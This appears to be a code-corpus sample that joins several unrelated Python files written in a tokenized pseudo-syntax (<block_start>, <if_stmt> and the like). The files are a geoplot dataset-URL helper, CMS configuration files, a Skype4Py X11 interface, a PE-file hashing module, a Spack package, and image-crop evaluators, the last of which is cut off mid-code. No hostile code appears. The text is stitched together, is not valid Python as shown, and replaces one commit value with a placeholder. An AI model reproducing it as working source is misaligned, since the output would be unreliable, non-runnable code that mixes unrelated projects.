""" Example dataset fetching utility. Used in docs. """<line_sep>src='https://raw.githubusercontent.com/ResidentMario/geoplot-data/master'<def_stmt>get_path dataset_name<block_start>""" Returns the URL path to an example dataset suitable for reading into ``geopandas``. """<if_stmt>dataset_name<eq>'usa_cities'<block_start><return>f'{src}/usa-cities.geojson'<block_end><elif_stmt>dataset_name<eq>'contiguous_usa'<block_start><return>f'{src}/contiguous-usa.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_collision_factors'<block_start><return>f'{src}/nyc-collision-factors.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_boroughs'<block_start><return>f'{src}/nyc-boroughs.geojson'<block_end><elif_stmt>dataset_name<eq>'ny_census'<block_start><return>f'{src}/ny-census-partial.geojson'<block_end><elif_stmt>dataset_name<eq>'obesity_by_state'<block_start><return>f'{src}/obesity-by-state.tsv'<block_end><elif_stmt>dataset_name<eq>'la_flights'<block_start><return>f'{src}/la-flights.geojson'<block_end><elif_stmt>dataset_name<eq>'dc_roads'<block_start><return>f'{src}/dc-roads.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_map_pluto_sample'<block_start><return>f'{src}/nyc-map-pluto-sample.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_collisions_sample'<block_start><return>f'{src}/nyc-collisions-sample.csv'<block_end><elif_stmt>dataset_name<eq>'boston_zip_codes'<block_start><return>f'{src}/boston-zip-codes.geojson'<block_end><elif_stmt>dataset_name<eq>'boston_airbnb_listings'<block_start><return>f'{src}/boston-airbnb-listings.geojson'<block_end><elif_stmt>dataset_name<eq>'napoleon_troop_movements'<block_start><return>f'{src}/napoleon-troop-movements.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_fatal_collisions'<block_start><return>f'{src}/nyc-fatal-collisions.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_injurious_collisions'<block_start><return>f'{src}/nyc-injurious-collisions.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_police_precincts'<block_start><return>f'{src}/nyc-police-precincts.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_parking_tickets'<block_start><return>f'{src}/nyc-parking-tickets-sample.geojson'<block_end><elif_stmt>dataset_name<eq>'world'<block_start><return>f'{src}/world.geojson'<block_end><elif_stmt>dataset_name<eq>'melbourne'<block_start><return>f'{src}/melbourne.geojson'<block_end><elif_stmt>dataset_name<eq>'melbourne_schools'<block_start><return>f'{src}/melbourne-schools.geojson'<block_end><elif_stmt>dataset_name<eq>'san_francisco'<block_start><return>f'{src}/san-francisco.geojson'<block_end><elif_stmt>dataset_name<eq>'san_francisco_street_trees_sample'<block_start><return>f'{src}/san-francisco-street-trees-sample.geojson'<block_end><elif_stmt>dataset_name<eq>'california_congressional_districts'<block_start><return>f'{src}/california-congressional-districts.geojson'<block_end><else_stmt><block_start><raise>ValueError(f'The dataset_name value {dataset_name!r} is not in the list of valid names.')<block_end><block_end>
# Unit test configuration file for MessageLogger service # Uses include MessageLogger.cfi and nothing else except time stamp suppression # Currently output will be jumbled unless cout and cerr are directed separately <import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("TEST")<import_stmt>FWCore.Framework.test.cmsExceptionsFatal_cff<line_sep>process.options=FWCore.Framework.test.cmsExceptionsFatal_cff.options<line_sep>process.load("FWCore.MessageService.test.Services_cff")<line_sep>process.load("FWCore.MessageService.MessageLogger_cfi")<line_sep>process.MessageLogger.default=cms.untracked.PSet(noTimeStamps=cms.untracked.bool(<true>))<line_sep>process.MessageLogger.cerr.noTimeStamps=<true><line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(1))<line_sep>process.source=cms.Source("EmptySource")<line_sep>process.sendSomeMessages=cms.EDAnalyzer("UnitTestClient_G")<line_sep>process.p=cms.Path(process.sendSomeMessages)<line_sep>
""" Low level *Skype for Linux* interface implemented using *XWindows messaging*. Uses direct *Xlib* calls through *ctypes* module. This module handles the options that you can pass to `Skype.__init__` for Linux machines when the transport is set to *X11*. No further options are currently supported. Warning PyGTK framework users ============================= The multithreaded architecture of Skype4Py requires a special treatment if the Xlib transport is combined with PyGTK GUI framework. The following code has to be called at the top of your script, before PyGTK is even imported. .. python:: from Skype4Py.api.posix_x11 import threads_init threads_init() This function enables multithreading support in Xlib and GDK. If not done here, this is enabled for Xlib library when the `Skype` object is instantiated. If your script imports the PyGTK module, doing this so late may lead to a segmentation fault when the GUI is shown on the screen. A remedy is to enable the multithreading support before PyGTK is imported by calling the ``threads_init`` function. """<line_sep>__docformat__='restructuredtext en'<import_stmt>sys<import_stmt>threading<import_stmt>os<import_from_stmt>ctypes *<import_from_stmt>ctypes.util find_library<import_stmt>time<import_stmt>logging<import_from_stmt>Skype4Py.api Command SkypeAPIBase timeout2float finalize_opts<import_from_stmt>Skype4Py.enums *<import_from_stmt>Skype4Py.errors SkypeAPIError<line_sep>__all__=['SkypeAPI' 'threads_init']<line_sep># The Xlib Programming Manual: # ============================ # http://tronche.com/gui/x/xlib/ # some Xlib constants PropertyChangeMask=0x400000<line_sep>PropertyNotify=28<line_sep>ClientMessage=33<line_sep>PropertyNewValue=0<line_sep>PropertyDelete=1<line_sep># some Xlib types c_ulong_p=POINTER(c_ulong)<line_sep>DisplayP=c_void_p<line_sep>Atom=c_ulong<line_sep>AtomP=c_ulong_p<line_sep>XID=c_ulong<line_sep>Window=XID<line_sep>Bool=c_int<line_sep>Status=c_int<line_sep>Time=c_ulong<line_sep>c_int_p=POINTER(c_int)<line_sep># should the structures be aligned to 8 bytes? 
align=(sizeof(c_long)<eq>8<and>sizeof(c_int)<eq>4)<line_sep># some Xlib structures <class_stmt>XClientMessageEvent(Structure)<block_start><if_stmt>align<block_start>_fields_=[('type' c_int) ('pad0' c_int) ('serial' c_ulong) ('send_event' Bool) ('pad1' c_int) ('display' DisplayP) ('window' Window) ('message_type' Atom) ('format' c_int) ('pad2' c_int) ('data' c_char<times>20)]<block_end><else_stmt><block_start>_fields_=[('type' c_int) ('serial' c_ulong) ('send_event' Bool) ('display' DisplayP) ('window' Window) ('message_type' Atom) ('format' c_int) ('data' c_char<times>20)]<block_end><block_end><class_stmt>XPropertyEvent(Structure)<block_start><if_stmt>align<block_start>_fields_=[('type' c_int) ('pad0' c_int) ('serial' c_ulong) ('send_event' Bool) ('pad1' c_int) ('display' DisplayP) ('window' Window) ('atom' Atom) ('time' Time) ('state' c_int) ('pad2' c_int)]<block_end><else_stmt><block_start>_fields_=[('type' c_int) ('serial' c_ulong) ('send_event' Bool) ('display' DisplayP) ('window' Window) ('atom' Atom) ('time' Time) ('state' c_int)]<block_end><block_end><class_stmt>XErrorEvent(Structure)<block_start><if_stmt>align<block_start>_fields_=[('type' c_int) ('pad0' c_int) ('display' DisplayP) ('resourceid' XID) ('serial' c_ulong) ('error_code' c_ubyte) ('request_code' c_ubyte) ('minor_code' c_ubyte)]<block_end><else_stmt><block_start>_fields_=[('type' c_int) ('display' DisplayP) ('resourceid' XID) ('serial' c_ulong) ('error_code' c_ubyte) ('request_code' c_ubyte) ('minor_code' c_ubyte)]<block_end><block_end><class_stmt>XEvent(Union)<block_start><if_stmt>align<block_start>_fields_=[('type' c_int) ('xclient' XClientMessageEvent) ('xproperty' XPropertyEvent) ('xerror' XErrorEvent) ('pad' c_long<times>24)]<block_end><else_stmt><block_start>_fields_=[('type' c_int) ('xclient' XClientMessageEvent) ('xproperty' XPropertyEvent) ('xerror' XErrorEvent) ('pad' c_long<times>24)]<block_end><block_end>XEventP=POINTER(XEvent)<if_stmt>getattr(sys 'skype4py_setup' <false>)# we get here if we're building docs; to let the module import without # exceptions, we emulate the X11 library using a class: <block_start><class_stmt>X(object)<block_start><def_stmt>__getattr__ self name<block_start><return>self<block_end><def_stmt>__setattr__ self name value<block_start><pass><block_end><def_stmt>__call__ self *args **kwargs<block_start><pass><block_end><block_end>x11=X()<block_end><else_stmt># load X11 library (Xlib) <block_start>libpath=find_library('X11')<if_stmt><not>libpath<block_start><raise>ImportError('Could not find X11 library')<block_end>x11=cdll.LoadLibrary(libpath)<del_stmt>libpath<block_end># setup Xlib function prototypes x11.XCloseDisplay.argtypes=(DisplayP )<line_sep>x11.XCloseDisplay.restype=<none><line_sep>x11.XCreateSimpleWindow.argtypes=(DisplayP Window c_int c_int c_uint c_uint c_uint c_ulong c_ulong)<line_sep>x11.XCreateSimpleWindow.restype=Window<line_sep>x11.XDefaultRootWindow.argtypes=(DisplayP )<line_sep>x11.XDefaultRootWindow.restype=Window<line_sep>x11.XDeleteProperty.argtypes=(DisplayP Window Atom)<line_sep>x11.XDeleteProperty.restype=<none><line_sep>x11.XDestroyWindow.argtypes=(DisplayP Window)<line_sep>x11.XDestroyWindow.restype=<none><line_sep>x11.XFree.argtypes=(c_void_p )<line_sep>x11.XFree.restype=<none><line_sep>x11.XGetAtomName.argtypes=(DisplayP Atom)<line_sep>x11.XGetAtomName.restype=c_void_p<line_sep>x11.XGetErrorText.argtypes=(DisplayP c_int c_char_p c_int)<line_sep>x11.XGetErrorText.restype=<none><line_sep>x11.XGetWindowProperty.argtypes=(DisplayP Window Atom c_long c_long Bool 
Atom AtomP c_int_p c_ulong_p c_ulong_p POINTER(POINTER(Window)))<line_sep>x11.XGetWindowProperty.restype=c_int<line_sep>x11.XInitThreads.argtypes=()<line_sep>x11.XInitThreads.restype=Status<line_sep>x11.XInternAtom.argtypes=(DisplayP c_char_p Bool)<line_sep>x11.XInternAtom.restype=Atom<line_sep>x11.XNextEvent.argtypes=(DisplayP XEventP)<line_sep>x11.XNextEvent.restype=<none><line_sep>x11.XOpenDisplay.argtypes=(c_char_p )<line_sep>x11.XOpenDisplay.restype=DisplayP<line_sep>x11.XPending.argtypes=(DisplayP )<line_sep>x11.XPending.restype=c_int<line_sep>x11.XSelectInput.argtypes=(DisplayP Window c_long)<line_sep>x11.XSelectInput.restype=<none><line_sep>x11.XSendEvent.argtypes=(DisplayP Window Bool c_long XEventP)<line_sep>x11.XSendEvent.restype=Status<line_sep>x11.XLockDisplay.argtypes=(DisplayP )<line_sep>x11.XLockDisplay.restype=<none><line_sep>x11.XUnlockDisplay.argtypes=(DisplayP )<line_sep>x11.XUnlockDisplay.restype=<none><def_stmt>threads_init gtk=<true><block_start>"""Enables multithreading support in Xlib and PyGTK. See the module docstring for more info. :Parameters: gtk : bool May be set to False to skip the PyGTK module. """<line_sep># enable X11 multithreading x11.XInitThreads()<if_stmt>gtk<block_start><import_from_stmt>gtk.gdk threads_init<line_sep>threads_init()<block_end><block_end><class_stmt>SkypeAPI(SkypeAPIBase)<block_start><def_stmt>__init__ self opts<block_start>self.logger=logging.getLogger('Skype4Py.api.posix_x11.SkypeAPI')<line_sep>SkypeAPIBase.__init__(self)<line_sep>finalize_opts(opts)<line_sep># initialize threads if not done already by the user threads_init(gtk=<false>)<line_sep># init Xlib display self.disp=x11.XOpenDisplay(<none>)<if_stmt><not>self.disp<block_start><raise>SkypeAPIError('Could not open XDisplay')<block_end>self.win_root=x11.XDefaultRootWindow(self.disp)<line_sep>self.win_self=x11.XCreateSimpleWindow(self.disp self.win_root 100 100 100 100 1 0 0)<line_sep>x11.XSelectInput(self.disp self.win_root PropertyChangeMask)<line_sep>self.win_skype=self.get_skype()<line_sep>ctrl='SKYPECONTROLAPI_MESSAGE'<line_sep>self.atom_msg=x11.XInternAtom(self.disp ctrl <false>)<line_sep>self.atom_msg_begin=x11.XInternAtom(self.disp ctrl+'_BEGIN' <false>)<line_sep>self.loop_event=threading.Event()<line_sep>self.loop_timeout=0.0001<line_sep>self.loop_break=<false><block_end><def_stmt>__del__ self<block_start><if_stmt>x11<block_start><if_stmt>hasattr(self 'disp')<block_start><if_stmt>hasattr(self 'win_self')<block_start>x11.XDestroyWindow(self.disp self.win_self)<block_end>x11.XCloseDisplay(self.disp)<block_end><block_end><block_end><def_stmt>run self<block_start>self.logger.info('thread started')<line_sep># main loop event=XEvent()<line_sep>data=''<while_stmt><not>self.loop_break<and>x11<block_start><while_stmt>x11.XPending(self.disp)<block_start>self.loop_timeout=0.0001<line_sep>x11.XNextEvent(self.disp byref(event))<line_sep># events we get here are already prefiltered by the predicate function <if_stmt>event.type<eq>ClientMessage<block_start><if_stmt>event.xclient.format<eq>8<block_start><if_stmt>event.xclient.message_type<eq>self.atom_msg_begin<block_start>data=str(event.xclient.data)<block_end><elif_stmt>event.xclient.message_type<eq>self.atom_msg<block_start><if_stmt>data<ne>''<block_start>data<augadd>str(event.xclient.data)<block_end><else_stmt><block_start>self.logger.warning('Middle of Skype X11 message received with no 
beginning!')<block_end><block_end><else_stmt><block_start><continue><block_end><if_stmt>len(event.xclient.data)<ne>20<and>data<block_start>self.notify(data.decode('utf-8'))<line_sep>data=''<block_end><block_end><block_end><elif_stmt>event.type<eq>PropertyNotify<block_start>namep=x11.XGetAtomName(self.disp event.xproperty.atom)<line_sep>is_inst=(c_char_p(namep).value<eq>'_SKYPE_INSTANCE')<line_sep>x11.XFree(namep)<if_stmt>is_inst<block_start><if_stmt>event.xproperty.state<eq>PropertyNewValue<block_start>self.win_skype=self.get_skype()<line_sep># changing attachment status can cause an event handler to be fired, in # turn it could try to call Attach() and doing this immediately seems to # confuse Skype (command '#0 NAME xxx' returns '#0 CONNSTATUS OFFLINE' :D); # to fix this, we give Skype some time to initialize itself time.sleep(1.0)<line_sep>self.set_attachment_status(apiAttachAvailable)<block_end><elif_stmt>event.xproperty.state<eq>PropertyDelete<block_start>self.win_skype=<none><line_sep>self.set_attachment_status(apiAttachNotAvailable)<block_end><block_end><block_end><block_end>self.loop_event.wait(self.loop_timeout)<if_stmt>self.loop_event.isSet()<block_start>self.loop_timeout=0.0001<block_end><elif_stmt>self.loop_timeout<l>1.0<block_start>self.loop_timeout<augmul>2<block_end>self.loop_event.clear()<block_end>self.logger.info('thread finished')<block_end><def_stmt>get_skype self<block_start>"""Returns Skype window ID or None if Skype not running."""<line_sep>skype_inst=x11.XInternAtom(self.disp '_SKYPE_INSTANCE' <true>)<if_stmt><not>skype_inst<block_start><return><block_end>type_ret=Atom()<line_sep>format_ret=c_int()<line_sep>nitems_ret=c_ulong()<line_sep>bytes_after_ret=c_ulong()<line_sep>winp=pointer(Window())<line_sep>fail=x11.XGetWindowProperty(self.disp self.win_root skype_inst 0 1 <false> 33 byref(type_ret) byref(format_ret) byref(nitems_ret) byref(bytes_after_ret) byref(winp))<if_stmt><not>fail<and>format_ret.value<eq>32<and>nitems_ret.value<eq>1<block_start><return>winp.contents.value<block_end><block_end><def_stmt>close self<block_start>self.loop_break=<true><line_sep>self.loop_event.set()<while_stmt>self.isAlive()<block_start>time.sleep(0.01)<block_end>SkypeAPIBase.close(self)<block_end><def_stmt>set_friendly_name self friendly_name<block_start>SkypeAPIBase.set_friendly_name(self friendly_name)<if_stmt>self.attachment_status<eq>apiAttachSuccess# reattach with the new name <block_start>self.set_attachment_status(apiAttachUnknown)<line_sep>self.attach()<block_end><block_end><def_stmt>attach self timeout wait=<true><block_start><if_stmt>self.attachment_status<eq>apiAttachSuccess<block_start><return><block_end>self.acquire()<try_stmt><block_start><if_stmt><not>self.isAlive()<block_start><try_stmt><block_start>self.start()<block_end><except_stmt>AssertionError<block_start><raise>SkypeAPIError('Skype API closed')<block_end><block_end><try_stmt><block_start>self.wait=<true><line_sep>t=threading.Timer(timeout2float(timeout) <lambda>:setattr(self 'wait' <false>))<if_stmt>wait<block_start>t.start()<block_end><while_stmt>self.wait<block_start>self.win_skype=self.get_skype()<if_stmt>self.win_skype<is><not><none><block_start><break><block_end><else_stmt><block_start>time.sleep(1.0)<block_end><block_end><else_stmt><block_start><raise>SkypeAPIError('Skype attach timeout')<block_end><block_end><finally_stmt><block_start>t.cancel()<block_end>command=Command('NAME %s'%self.friendly_name '' <true> timeout)<line_sep>self.release()<try_stmt><block_start>self.send_command(command 
<true>)<block_end><finally_stmt><block_start>self.acquire()<block_end><if_stmt>command.Reply<ne>'OK'<block_start>self.win_skype=<none><line_sep>self.set_attachment_status(apiAttachRefused)<line_sep><return><block_end>self.set_attachment_status(apiAttachSuccess)<block_end><finally_stmt><block_start>self.release()<block_end>command=Command('PROTOCOL %s'%self.protocol Blocking=<true>)<line_sep>self.send_command(command <true>)<line_sep>self.protocol=int(command.Reply.rsplit(<none> 1)[-1])<block_end><def_stmt>is_running self<block_start><return>(self.get_skype()<is><not><none>)<block_end><def_stmt>startup self minimized nosplash# options are not supported as of Skype 1.4 Beta for Linux <block_start><if_stmt><not>self.is_running()<block_start><if_stmt>os.fork()<eq>0# we're the child <block_start>os.setsid()<line_sep>os.execlp('skype' 'skype')<block_end><block_end><block_end><def_stmt>shutdown self<block_start><import_from_stmt>signal SIGINT<line_sep>fh=os.popen('ps -o %p --no-heading -C skype')<line_sep>pid=fh.readline().strip()<line_sep>fh.close()<if_stmt>pid<block_start>os.kill(int(pid) SIGINT)<line_sep># Skype sometimes doesn't delete the '_SKYPE_INSTANCE' property skype_inst=x11.XInternAtom(self.disp '_SKYPE_INSTANCE' <true>)<if_stmt>skype_inst<block_start>x11.XDeleteProperty(self.disp self.win_root skype_inst)<block_end>self.win_skype=<none><line_sep>self.set_attachment_status(apiAttachNotAvailable)<block_end><block_end><def_stmt>send_command self command force=<false><block_start><if_stmt>self.attachment_status<ne>apiAttachSuccess<and><not>force<block_start>self.attach(command.Timeout)<block_end>self.push_command(command)<line_sep>self.notifier.sending_command(command)<line_sep>cmd=u'#%d %s'%(command.Id command.Command)<line_sep>self.logger.debug('sending %s' repr(cmd))<if_stmt>command.Blocking<block_start>command._event=bevent=threading.Event()<block_end><else_stmt><block_start>command._timer=timer=threading.Timer(command.timeout2float() self.pop_command (command.Id ))<block_end>event=XEvent()<line_sep>event.xclient.type=ClientMessage<line_sep>event.xclient.display=self.disp<line_sep>event.xclient.window=self.win_self<line_sep>event.xclient.message_type=self.atom_msg_begin<line_sep>event.xclient.format=8<line_sep>cmd=cmd.encode('utf-8')+'\x00'<for_stmt>i xrange(0 len(cmd) 20)<block_start>event.xclient.data=cmd[i:i+20]<line_sep>x11.XSendEvent(self.disp self.win_skype <false> 0 byref(event))<line_sep>event.xclient.message_type=self.atom_msg<block_end>self.loop_event.set()<if_stmt>command.Blocking<block_start>bevent.wait(command.timeout2float())<if_stmt><not>bevent.isSet()<block_start><raise>SkypeAPIError('Skype command timeout')<block_end><block_end><else_stmt><block_start>timer.start()<block_end><block_end><def_stmt>notify self cmd<block_start>self.logger.debug('received %s' repr(cmd))<line_sep># Called by main loop for all received Skype commands. <if_stmt>cmd.startswith(u'#')<block_start>p=cmd.find(u' ')<line_sep>command=self.pop_command(int(cmd[1:p]))<if_stmt>command<is><not><none><block_start>command.Reply=cmd[p+1:]<if_stmt>command.Blocking<block_start>command._event.set()<block_end><else_stmt><block_start>command._timer.cancel()<block_end>self.notifier.reply_received(command)<block_end><else_stmt><block_start>self.notifier.notification_received(cmd[p+1:])<block_end><block_end><else_stmt><block_start>self.notifier.notification_received(cmd)<block_end><block_end><block_end>
# # Copyright (c) 2020 BlackBerry Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Hash all portions of a PE file, this may be run as a separate process"""<line_sep># Standard imports <import_stmt>json<import_stmt>hashlib<import_stmt>pefile<def_stmt>hash_data data entropy_H<block_start>"""Calculate MD5/SHA1/SHA256 of given data Args: data (bytes): Data to calculate hashes/entropy entropy_H (pefile.SectionStructure.entropy_H): Callback function for calculating entropy Returns: dict: Dictionary of hashes/entropy """<line_sep>md5=hashlib.md5()<line_sep>sha1=hashlib.sha1()<line_sep>sha256=hashlib.sha256()<line_sep>md5.update(data)<line_sep>sha1.update(data)<line_sep>sha256.update(data)<line_sep><return>{"md5":md5.hexdigest() "sha1":sha1.hexdigest() "sha256":sha256.hexdigest() "entropy":entropy_H(data) "size":len(data)}<block_end><def_stmt>hash_pe_file filename data=<none> pe=<none> json_dumps=<true><block_start>"""Calculate PE file hashes. Either call directly or invoke via processpool:: processpool = multiprocessing.Pool(10) hashes = json.loads(processpool.apply_async(pe_tree.hash_pe.hash_pe_file, (filename,)).get()) Args: filename (str): Path to file to hash (or specify via data) data (bytes, optional): PE file data pe (pefile.PE, optional): Parsed PE file json_dumps (bool, optional): Return data as JSON Returns: dict: PE file hashes if json_dumps == False str: JSON PE file hashes if json_dumps == True """<if_stmt>pe<is><none><block_start>pe=pefile.PE(filename)<block_end># Calculate entropy (use pefile implementation!) 
entropy_H=pefile.SectionStructure(pe.__IMAGE_SECTION_HEADER_format__ pe=pe).entropy_H<line_sep>file_hashes={"file":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0} "file_no_overlay":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0} "dos_stub":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0} "sections":[] "resources":[] "security_directory":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0} "overlay":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0}}<if_stmt><not>data<block_start><with_stmt>open(filename "rb")<as>f<block_start>data=f.read()<block_end><block_end># Hash entire file file_hashes["file"]=hash_data(data entropy_H)<line_sep># Hash DOS stub <if_stmt>pe.DOS_HEADER.e_lfanew<g>64<block_start>file_hashes["dos_stub"]=hash_data(data[64:pe.DOS_HEADER.e_lfanew] entropy_H)<block_end># Hash sections <for_stmt>section pe.sections<block_start>file_hashes["sections"].append({"md5":section.get_hash_md5() "sha256":section.get_hash_sha256() "entropy":section.get_entropy()})<block_end># Hash resources <if_stmt>hasattr(pe "DIRECTORY_ENTRY_RESOURCE")<block_start>mapped_data=pe.get_memory_mapped_image()<for_stmt>resource_type pe.DIRECTORY_ENTRY_RESOURCE.entries<block_start><if_stmt><not>hasattr(resource_type "directory")<block_start><continue><block_end><for_stmt>resource_id resource_type.directory.entries<block_start><if_stmt><not>hasattr(resource_id "directory")<block_start><continue><block_end><for_stmt>resource_language resource_id.directory.entries<block_start><if_stmt><not>hasattr(resource_language "data")<block_start><continue><block_end>offset=resource_language.data.struct.OffsetToData<line_sep>size=resource_language.data.struct.Size<try_stmt><block_start>resource_data=mapped_data[offset:offset+size]<block_end><except_stmt><block_start>resource_data=""<block_end>file_hashes["resources"].append(hash_data(resource_data entropy_H))<block_end><block_end><block_end><block_end>overlay_offset=pe.get_overlay_data_start_offset()<if_stmt>overlay_offset<block_start>overlay_data=pe.get_overlay()<line_sep>security=pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_SECURITY"]]<if_stmt>security.VirtualAddress<ne>0<and>security.Size<ne>0<block_start>size=min(security.Size len(overlay_data))<line_sep># Hash security directory file_hashes["security_directory"]=hash_data(overlay_data[:size] entropy_H)<line_sep>overlay_data=overlay_data[size:]<line_sep>overlay_offset<augadd>size<block_end># Hash overlay file_hashes["overlay"]=hash_data(overlay_data entropy_H)<line_sep>file_hashes["file_no_overlay"]=hash_data(data[overlay_offset:] entropy_H)<block_end># Return JSON <if_stmt>json_dumps<block_start><return>json.dumps(file_hashes)<block_end># Return dict <return>file_hashes<block_end>
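# Editor's hedged usage sketch (not part of the original pe_tree module): run the hasher above directly on a hypothetical local file 'sample.exe' and read a couple of fields from the returned dictionary. <if_stmt>__name__<eq>'__main__'<block_start>demo_hashes=hash_pe_file('sample.exe' json_dumps=<false>)<line_sep>print(demo_hashes['file']['sha256'] demo_hashes['overlay']['size'])<block_end>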
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>DQMOffline.Trigger.photonMonitoring_cfi photonMonitoring<line_sep>hltPhotonmonitoring=photonMonitoring.clone()<line_sep>hltPhotonmonitoring.FolderName=cms.string('HLT/Photon/Photon200/')<line_sep>hltPhotonmonitoring.histoPSet.lsPSet=cms.PSet(nbins=cms.uint32(250) xmin=cms.double(0.) xmax=cms.double(2500.) )<line_sep>hltPhotonmonitoring.histoPSet.photonPSet=cms.PSet(nbins=cms.uint32(500) xmin=cms.double(0.0) xmax=cms.double(5000) )<line_sep>hltPhotonmonitoring.met=cms.InputTag("pfMetEI")# pfMet hltPhotonmonitoring.jets=cms.InputTag("pfJetsEI")# ak4PFJets, ak4PFJetsCHS hltPhotonmonitoring.electrons=cms.InputTag("gedGsfElectrons")# while pfIsolatedElectronsEI are reco::PFCandidate ! hltPhotonmonitoring.photons=cms.InputTag("gedPhotons")# while pfIsolatedElectronsEI are reco::PFCandidate ! hltPhotonmonitoring.numGenericTriggerEventPSet.andOr=cms.bool(<false>)<line_sep>#hltPhotonmonitoring.numGenericTriggerEventPSet.dbLabel = cms.string("ExoDQMTrigger") # it does not exist yet, we should consider the possibility of using the DB, but as it is now it will need a label per path ! hltPhotonmonitoring.numGenericTriggerEventPSet.andOrHlt=cms.bool(<true>)# True:=OR; False:=AND hltPhotonmonitoring.numGenericTriggerEventPSet.hltInputTag=cms.InputTag("TriggerResults::HLT")<line_sep>hltPhotonmonitoring.numGenericTriggerEventPSet.hltPaths=cms.vstring("HLT_Photon175_v*")# HLT_ZeroBias_v* #hltPhotonmonitoring.numGenericTriggerEventPSet.hltDBKey = cms.string("EXO_HLT_MET") hltPhotonmonitoring.numGenericTriggerEventPSet.errorReplyHlt=cms.bool(<false>)<line_sep>hltPhotonmonitoring.numGenericTriggerEventPSet.verbosityLevel=cms.uint32(1)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.andOr=cms.bool(<false>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.andOrHlt=cms.bool(<true>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.hltInputTag=cms.InputTag("TriggerResults::HLT")<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.hltPaths=cms.vstring("HLT_PFJet40_v*" "HLT_PFJet60_v*" "HLT_PFJet80_v*")# HLT_ZeroBias_v* hltPhotonmonitoring.denGenericTriggerEventPSet.errorReplyHlt=cms.bool(<false>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.dcsInputTag=cms.InputTag("scalersRawToDigi")<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.dcsPartitions=cms.vint32(24 25 26 27 28 29)# 24-27: strip, 28-29: pixel, we should add all other detectors ! hltPhotonmonitoring.denGenericTriggerEventPSet.andOrDcs=cms.bool(<false>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.errorReplyDcs=cms.bool(<true>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.verbosityLevel=cms.uint32(1)<line_sep>
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) # Spack package DSL import (assumed; provides RubyPackage, version and filter_file) <import_from_stmt>spack *<class_stmt>RubyErubis(RubyPackage)<block_start>"""Erubis is a fast, secure, and very extensible implementation of eRuby. """<line_sep>homepage="http://www.kuwata-lab.com/erubis/"<line_sep>git="https://github.com/kwatch/erubis.git"<line_sep>version('master' branch='master')<line_sep>version('2.7.0' commit='<PASSWORD>')<def_stmt>patch self<block_start>filter_file('$Release$' str(self.version) 'erubis.gemspec' string=<true>)<block_end><block_end>
<import_stmt>os<import_stmt>cv2<line_sep>cv2.setNumThreads(0)<line_sep>cv2.ocl.setUseOpenCL(<false>)<import_stmt>numpy<as>np<import_from_stmt>.eval Evaluator<class_stmt>FullImageEvaluator(Evaluator)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><def_stmt>process_batch self predicted model data prefix=""<block_start>names=data['image_name']<for_stmt>i range(len(names))<block_start>self.on_image_constructed(names[i] predicted[i <ellipsis>] prefix)<block_end><block_end><def_stmt>save self name prediction prefix=""<block_start>cv2.imwrite(os.path.join(self.save_dir prefix+name) (prediction<times>255).astype(np.uint8))<block_end><block_end><class_stmt>CropEvaluator(Evaluator)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<line_sep>self.current_mask=<none><line_sep>self.current_prediction=<none><line_sep>self.current_image_name=<none><block_end><def_stmt>process_batch self predicted model data prefix=""<block_start>names=data['image_name']<line_sep>config=self.config<line_sep>batch_geometry=self.parse_geometry(data['geometry'])<for_stmt>i range(len(names))<block_start>name=names[i]<line_sep>geometry=batch_geometry[i]<line_sep>sx,sy=geometry['sx'] geometry['sy']<line_sep>pred=self.cut_border(np.squeeze(predicted[i <ellipsis>]))<if_stmt>name<ne>self.current_image_name<block_start><if_stmt>self.current_image_name<is><none><block_start>self.current_image_name=name<block_end><else_stmt><block_start>self.on_image_constructed(self.current_image_name self.current_prediction/self.current_mask prefix=prefix)<block_end>self.construct_big_image(geometry)<block_end>self.current_prediction[sy+self.border:sy+config.target_rows-self.border sx+self.border:sx+config.target_cols-self.border]<augadd>pred<line_sep>self.current_mask[sy+self.border:sy+config.target_rows-self.border sx+self.border:sx+config.target_cols-self.border]<augadd>1<line_sep>self.current_image_name=name<block_end><block_end><def_stmt>parse_geometry self batch_geometry<block_start>rows=batch_geometry['rows'].numpy()<line_sep>cols=batch_geometry['cols'].numpy()<line_sep>sx=batch_geometry['sx'].numpy()<line_sep>sy=batch_geometry['sy'].numpy()<line_sep>geometries=[]<for_stmt>idx range(rows.shape[0])<block_start>geometry={'rows':rows[idx] 'cols':cols[idx] 'sx':sx[idx] 